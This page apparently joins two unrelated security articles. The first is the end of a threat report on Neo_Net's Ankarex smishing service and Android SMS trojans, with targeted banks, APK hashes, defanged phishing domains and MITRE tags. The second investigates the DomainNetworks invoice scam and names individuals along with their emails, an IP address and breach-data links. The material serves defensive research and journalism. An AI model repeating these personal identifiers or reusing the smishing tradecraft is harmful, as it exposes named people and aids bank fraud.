Through his contributions on Telegram, Neo_Net has been linked to the “macosfera.com” forum, a Spanish-language IT forum. Email addresses registered with the forum’s domain were found in relation to several phishing panels created by Neo_Net, targeting Spanish banks and other institutions. These email addresses were used as usernames for the panels, suggesting that Neo_Net may have collaborated with individuals from this forum to set up his infrastructure. The phishing panels also clearly indicate Neo_Net as the creator, with his signature on top of the php files.

Fig 9: Phishing panels with links to macosfera[.]com (VirusTotal)
Fig 9: Phishing panels with links to macosfera[.]com (VirusTotal)

Ankarex

Neo_Net’s main creation is the Ankarex Smishing-as-a-Service platform, which has been active since at least May 2022. The Ankarex News Channel on Telegram, which advertises the service, currently has 1700 subscribers and regularly posts updates about the software, as well as limited offers and giveaways.

Fig 10: Halloween offer for 15% extra funds when recharging the account
Fig 10: Halloween offer for 15% extra funds when recharging the account

The service itself is accessible at ankarex[.]net, and once registered, users can upload funds using cryptocurrency transfers and launch their own Smishing campaigns by specifying the SMS content and target phone numbers. Ankarex currently targets 9 countries but has historically operated in additional regions.

Fig 11: Ankarex target countries and prices list
Fig 11: Ankarex target countries and prices list

In addition to the Smishing service, Neo_Net has also offered leads, including victims’ names, email addresses, IBANs, and phone numbers for sale on the Ankarex Channel. He has also advertised his Android SMS spyware service to selected members. Notably, every channel created to exfiltrate the captured SMS messages has Neo_Net listed as an administrator, and several package names of the Android trojans allude to their creator with names such as com.neonet.app.reader. It is likely that Neo_Net rented his infrastructure to affiliates, some of whom have been observed working with him on multiple unique campaigns, allowing them to conduct phishing and funds transfers independently.

Fig 12: Neo_Net demonstrating Ankarex on his own phone and exhibiting remarkable OPSEC throughout his campaigns
Fig 12: Neo_Net demonstrating Ankarex on his own phone and exhibiting remarkable OPSEC throughout his campaigns

Throughout his year-long operation, Neo_Net has been traced back to several unique IP addresses, indicating that he currently resides in Mexico. Neo_Net primarily operates in Spanish-speaking countries and communicates predominantly in Spanish with his affiliates. Communication in the Ankarex channel is almost exclusively done in Spanish.

However, Neo_Net has also been observed collaborating with non-Spanish speakers, including another cybercriminal identified by the Telegram handle devilteam666. This particular operation involved the use of Google Ads targeting crypto wallet owners, and devilteam666 continues to offer malicious Google Ads services on his Telegram channel.

Conclusion

Despite employing mostly unsophisticated tools and techniques, such as simple SMS spyware and phishing panels, Neo_Net and his affiliates have managed to steal hundreds of thousands of euros and compromise the personally identifiable information (PII) of thousands of victims worldwide. The success of their campaigns can be attributed to the highly targeted nature of their operations, often focusing on a single bank, and copying their communications to impersonate bank agents. Furthermore, due to the simplicity of SMS spyware, it can be difficult to detect, as it only requires permission to send and view SMS messages.

Neo_Net has also been observed reusing compromised PII for further profit. A significant amount of eCrime against mobile users in Spain over the past two years can be directly traced back to Neo_Net’s operation, including his phishing panels, Smishing-as-a-Service platform, and Android trojans.

These campaigns highlight that while Multi-Factor Authentication is robust, it can be circumvented if it relies on SMS, and that physical tokens or external applications would provide better protection in such cases.

Acknowledgments

Special thanks go to @malwrhunterteam who posted about several samples used in this campaign on his Twitter account.

Appendix A: Targeted Financial Institutions

  • Spain: Santander, BBVA, CaixaBank, Sabadell, ING España, Unicaja, Kutxabank, Bankinter, Abanca, Laboral Kutxa, Ibercaja, BancaMarch, CajaSur, OpenBank, Grupo Caja Rural, Cajalmendralejo, MoneyGo, Cecabank, Cetelem, Colonya, Self Bank, Banca Pueyo
  • France: Crédit Agricole, Caisse d’Epargne, La Banque postale, Boursorama, Banque de Bretagne
  • Greece: National Bank of Greece
  • Germany: Sparkasse, Deutsche Bank, Commerzbank
  • United Kingdom: Santander UK
  • Austria: BAWAG P.S.K.
  • Netherlands: ING
  • Poland: PKO Bank Polski
  • Chile: BancoEstado, Scotiabank (Cencosud Scotiabank), Santander (officebanking), Banco Ripley, Banco de Chile, Banco Falabella, Banco de Crédito e Inversiones, Itaú CorpBanca
  • Colombia: Bancolombia
  • Venezuela: Banco de Venezuela
  • Peru: BBVA Peru
  • Ecuador: Banco Pichincha
  • Panama: Zinli
  • USA: Prosperity Bank, Greater Nevada Credit Union
  • Australia: CommBank

Appendix B

Indicators of Compromise

APK SHA1 Hashes Main Activity Name Impersonated Institution
de8929c1a0273d0ed0dc3fc55058e0cb19486b3c com.neonet.app.reader.MainActivity BBVA
b344fe1bbb477713016d41d996c0772a308a5146 com.neonet.app.reader.MainActivity Laboral Kutxa
8a099af61f1fa692f45538750d42aab640167fd2 com.neonet.app.reader.MainActivity Correos
ab14161e243d478dac7a83086ed4839f8ad7ded8 com.neonet.app.reader.MainActivity BBVA
ded2655512de7d3468f63f9487e16a0bd17818ff com.neonet.app.reader.MainActivity CaixaBank
a5208de82def52b4019a6d3a8da9e14a13bc2c43 com.neonet.app.reader.MainActivity CaixaBank
21112c1955d131fa6cab617a3d7265acfab783c2 com.neonet.app.reader.MainActivity Openbank
6ea53a65fe3a1551988c6134db808e622787e7f9 com.neonet.app.reader.MainActivity Unicaja
62236a501e11d5fbfe411d841caf5f2253c150b8 com.neonet.app.reader.MainActivity BBVA
7f0c3fdbfcdfc24c2da8aa3c52aa13f9b9cdda84 com.neonet.app.reader.MainActivity BBVA
f918a6ecba56df298ae635a6a0f008607b0420b9 com.neonet.app.reader.MainActivity Santander
ffbcdf915916595b96f627df410722cee5b83f13 com.neonet.app.reader.MainActivity BBVA
7b4ab7b2ead7e004c0d93fe916af39c156e0bc61 com.neonet.app.reader.MainActivity CajaSur
34d0faea99d94d3923d0b9e36ef9e0c48158e7a0 com.neonet.app.reader.MainActivity BBVA
e6c485551d4f209a0b7b1fa9aa78b7efb51be49b com.neonet.app.reader.MainActivity BBVA
1df3ed2e2957efbd1d87aac0c25a3577318b8e2a com.neonet.app.reader.MainActivity BBVA
6a907b8e5580a5067d9fb47ef21826f164f68f3f com.neonet.app.reader.MainActivity Grupo Caja Rural
5d1c7ff3d16ec770cf23a4d82a91358b9142d21a com.neonet.app.reader.MainActivity Grupo Caja Rural
86ad0123fa20b7c0efb6fe8afaa6a756a86c9836 com.neonet.app.reader.MainActivity Grupo Caja Rural
14a36f18a45348ad9efe43b20d049f3345735163 com.neonet.app.reader.MainActivity Cajalmendralejo
b506503bb71f411bb34ec8124ed26ae27a4834b9 com.neonet.app.reader.MainActivity BBVA
afe84fa17373ec187781f72c330dfb7bb3a42483 com.cannav.cuasimodo.jumper.actividades BBVA
445468cd5c298f0393f19b92b802cfa0f76c32d4 com.cannav.cuasimodo.jumper.actividades BBVA
8491ff15ad27b90786585b06f81a3938d5a61b39 com.cannav.cuasimodo.jumper.actividades BBVA
2714e0744ad788142990696f856c5ffbc7173cf4 com.cannav.cuasimodo.jumper.actividades BBVA
1ce0afe5e09b14f8aee6715a768329660e95121e com.cannav.cuasimodo.jumper.actividades BBVA
96a3600055c63576be9f7dc97c5b25f1272edd2b com.cannav.cuasimodo.jumper.actividades BBVA
9954ae7d31ea65cd6b8cbdb396e7b99b0cf833f4 com.cannav.cuasimodo.jumper.actividades BBVA
07159f46a8adde95f541a123f2dda6c49035aad1 com.cannav.cuasimodo.jumper.actividades BBVA
ab19a95ef3adcb83be76b95eb7e7c557812ad2f4 com.cannav.cuasimodo.jumper.actividades BBVA
db8eeab4ab2e2e74a34c47ad297039485ff75f22 com.cannav.cuasimodo.jumper.actividades BBVA
dbf0cec18caabeb11387f7e6d14df54c808e441d com.cannav.cuasimodo.jumper.actividades BBVA
69d38eed5dc89a7b54036cc7dcf7b96fd000eb92 com.cannav.cuasimodo.jumper.actividades BBVA
c38107addc00e2a2f5dcb6ea0cbce40400c23b49 com.cannav.cuasimodo.jumper.actividades BBVA
279048e07c25fd75c4cef7c64d1ae741e178b35b com.uklapon.mafin.chinpiling.actividades Bankinter
ef8c5d639390d9ba138ad9c2057524ff6e1398de BBVA
e7c2d0c80125909d85913dfb941bdc373d677326 ING
145bd67f94698cc5611484f46505b3dc825bd6cd BancoEstado

Phishing Domains

bbva.info-cliente[.]net
santander.esentregas[.]ga
bbva.esentregas[.]ga
correos.esentregas[.]ga

Appendix C: MITRE ATT&CK Tags

ID Technique Explanation
T1406.002 Obfuscated Files or Information: Software Packing Some APK files are packed and drop the unpacked dex file once executed
T1633.001 Virtualization/Sandbox Evasion: System Checks Some APK files have been modified and initially check for common sandbox names before unpacking
T1426 System Information Discovery The Sms Eye trojan collects the brand and model of the infected phone
T1636.004 Protected User Data: SMS Messages The Sms Eye trojan collects incoming SMS messages
T1437.001 Application Layer Protocol: Web Protocols The Sms Eye trojan exfiltrates SMS messages over HTTPS
T1481.003 Web Service: One-Way Communication The Sms Eye trojan uses the Telegram Bot API to exfiltrate SMS messages
T1521.002 Encrypted Channel: Asymmetric Cryptography The C2 channel is encrypted by TLS
T1646 Exfiltration Over C2 Channel The SMS messages are exfiltrated over the C2 channel

Who’s Behind the DomainNetworks Snail Mail Scam?

/0 Comments/in /by

If you’ve ever owned a domain name, the chances are good that at some point you’ve received a snail mail letter which appears to be a bill for a domain or website-related services. In reality, these misleading missives try to trick people into paying for useless services they never ordered, don’t need, and probably will never receive. Here’s a look at the most recent incarnation of this scam — DomainNetworks — and some clues about who may be behind it.

The DomainNetworks mailer may reference a domain that is or was at one point registered to your name and address. Although the letter includes the words “marketing services” in the upper right corner, the rest of the missive is deceptively designed to look like a bill for services already rendered.

DomainNetworks claims that listing your domain with their promotion services will result in increased traffic to your site. This is a dubious claim for a company that appears to be a complete fabrication, as we’ll see in a moment.  But happily, the proprietors of this enterprise were not so difficult to track down.

The website Domainnetworks[.]com says it is a business with a post office box in Hendersonville, N.C., and another address in Santa Fe, N.M. There are a few random, non-technology businesses tied to the phone number listed for the Hendersonville address, and the New Mexico address was used by several no-name web hosting companies.

However, there is little connected to these addresses and phone numbers that get us any closer to finding out who’s running Domainnetworks[.]com. And neither entity appears to be an active, official company in their supposed state of residence, at least according to each state’s Secretary of State database.

The Better Business Bureau listing for DomainNetworks gives it an “F” rating, and includes more than 100 reviews by people angry at receiving one of these scams via snail mail. Helpfully, the BBB says DomainNetworks previously operated under a different name: US Domain Authority LLC.

DomainNetworks has an “F” reputation with the Better Business Bureau.

Copies of snail mail scam letters from US Domain Authority posted online show that this entity used the domain usdomainauthority[.]com, registered in May 2022. The Usdomainauthority mailer also featured a Henderson, NC address, albeit at a different post office box.

Usdomainauthority[.]com is no longer online, and the site seems to have blocked its pages from being indexed by the Wayback Machine at archive.org. But searching on a long snippet of text from DomainNetworks[.]com about refund requests shows that this text was found on just one other active website, according to publicwww.com, a service that indexes the HTML code of existing websites and makes it searchable.

A deceptive snail mail solicitation from DomainNetwork’s previous iteration — US Domain Authority. Image: Joerussori.com

That other website is a domain registered in January 2023 called thedomainsvault[.]com, and its registration details are likewise hidden behind privacy services. Thedomainsvault’s “Frequently Asked Questions” page is quite similar to the one on the DomainNetworks website; both begin with the question of why the company is sending a mailer that looks like a bill for domain services.

Thedomainsvault[.]com includes no useful information about the entity or people who operate it; clicking the “Contact-us” link on the site brings up a page with placeholder Lorem Ipsum text, a contact form, and a phone number of 123456789.

However, searching passive DNS records at DomainTools.com for thedomainsvault[.]com shows that at some point whoever owns the domain instructed incoming email to be sent to ubsagency@gmail.com.

The first result that currently pops up when searching for “ubsagency” in Google is ubsagency[.]com, which says it belongs to a Las Vegas-based Search Engine Optimization (SEO) and digital marketing concern generically named both United Business Service and United Business Services. UBSagency’s website is hosted at the same Ann Arbor, Mich. based hosting firm (A2 Hosting Inc) as thedomainsvault[.]com.

UBSagency’s LinkedIn page says the company has offices in Vegas, Half Moon Bay, Calif., and Renton, Wash. But once again, none of the addresses listed for these offices reveal any obvious clues about who runs UBSagency. And once again, none of these entities appear to exist as official businesses in their claimed state of residence.

Searching on ubsagency@gmail.com in Constella Intelligence shows the address was used sometime before February 2019 to create an account under the name “SammySam_Alon” at the interior decorating site Houzz.com. In January 2019, Houzz acknowledged that a data breach exposed account information on an undisclosed number of customers, including user IDs, one-way encrypted passwords, IP addresses, city and ZIP codes, as well as Facebook information.

SammySam_Alon registered at Houzz using an Internet address in Huntsville, Ala. (68.35.149.206). Constella says this address was associated with the email tropicglobal@gmail.com, which also is tied to several other “Sammy” accounts at different stores online.

Constella also says a highly unique password re-used by tropicglobal@gmail.com across numerous sites was used in connection with just a few other email accounts, including shenhavgroup@gmail.com, and distributorinvoice@mail.com.

The shenhavgroup@gmail.com address was used to register a Twitter account for a Sam Orit Alon in 2013, whose account says they are affiliated with the Shenhav Group. According to DomainTools, shenhavgroup@gmail.com was responsible for registering roughly two dozen domains, including the now-defunct unitedbusinessservice[.]com.

Constella further finds that the address distributorinvoice@mail.com was used to register an account at whmcs.com, a web hosting platform that suffered a breach of its user database several years back. The name on the WHMCS account was Shmuel Orit Alon, from Kidron, Israel.

UBSagency also has a Facebook page, or maybe “had” is the operative word because someone appears to have defaced it. Loading the Facebook page for UBSagency shows several of the images have been overlaid or replaced with a message from someone who is really disappointed with Sam Alon.

“Sam Alon is a LIAR, THIEF, COWARD AND HAS A VERY SMALL D*CK,” reads one of the messages:

The current Facebook profile page for UBSagency includes a logo that is similar to the DomainNetworks logo.

The logo in the UBSagency profile photo includes a graphic of what appears to be a magnifying glass with a line that zig-zags through bullet points inside and outside the circle, a unique pattern that is remarkably similar to the logo for DomainNetworks:

The logos for DomainNetworks (left) and UBSagency.

Constella also found that the same Huntsville IP address used by Sam Alon at Houzz was associated with yet another Houzz account, this one for someone named “Eliran.”

The UBSagency Facebook page features several messages from an Eliran “Dani” Benz, who is referred to by commenters as an employee or partner with UBSagency. The last check-in on Benz’s profile is from a beach at Rishon Le Siyon in Israel earlier this year.

Neither Mr. Alon nor Mr. Benz responded to multiple requests for comment.

It may be difficult to believe that anyone would pay an invoice for a domain name or SEO service they never ordered. However, there is plenty of evidence that these phony bills often get processed by administrative personnel at organizations that end up paying the requested amount because they assume it was owed for some services already provided.

In 2018, KrebsOnSecurity published How Internet Savvy are Your Leaders?, which examined public records to show that dozens of cities, towns, school districts and even political campaigns across the United States got snookered into paying these scam domain invoices from a similar scam company called WebListings Inc.

In 2020, KrebsOnSecurity featured a deep dive into who was likely behind the WebListings scam, which had been sending out these snail mail scam letters for over a decade. That investigation revealed the scam’s connection to a multi-level marketing operation run out of the U.K., and to two brothers living in Scotland.